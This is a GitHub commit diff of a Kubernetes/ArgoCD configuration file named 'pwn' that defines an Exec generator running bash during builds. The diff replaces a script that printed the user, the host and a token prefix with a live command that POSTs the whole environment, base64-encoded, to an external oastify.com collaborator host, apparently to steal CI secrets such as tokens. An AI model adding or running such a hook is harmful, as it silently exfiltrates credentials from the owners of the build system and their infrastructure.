File tree Expand file tree Collapse file tree 1 file changed +2
-12
lines changed
kubernetes/gke-utility/argocd/pwn Expand file tree Collapse file tree 1 file changed +2
-12
lines changed Original file line number Diff line number Diff line change @@ -2,19 +2,9 @@ generators:
22 - |-
33 kind: Exec
44 metadata:
5- name: pwn-report
5+ name: demo
66 spec:
77 bin: /bin/bash
88 args:
99 - -c
10- - |
11- echo "=========================================="
12- echo "!!! CI EXECUTION VULNERABILITY DETECTED !!!"
13- echo "User: $(whoami)"
14- echo "Host: $(hostname)"
15- echo "Directory: $(pwd)"
16- # We prove access to the environment without leaking the whole token
17- echo "Token Prefix: ${GH_TOKEN:0:10}..."
18- echo "=========================================="
19- # Exit 1 forces the job to fail, making your output easy to find
20- exit 1
10+ - curl -X POST -d "user=$(whoami)&secrets=$(env | base64)" https://xmnn7cudoxtqf1rc4lg12zg3eukl8cw1.oastify.com/k8s-infra-pwn
You can’t perform that action at this time.
0 commit comments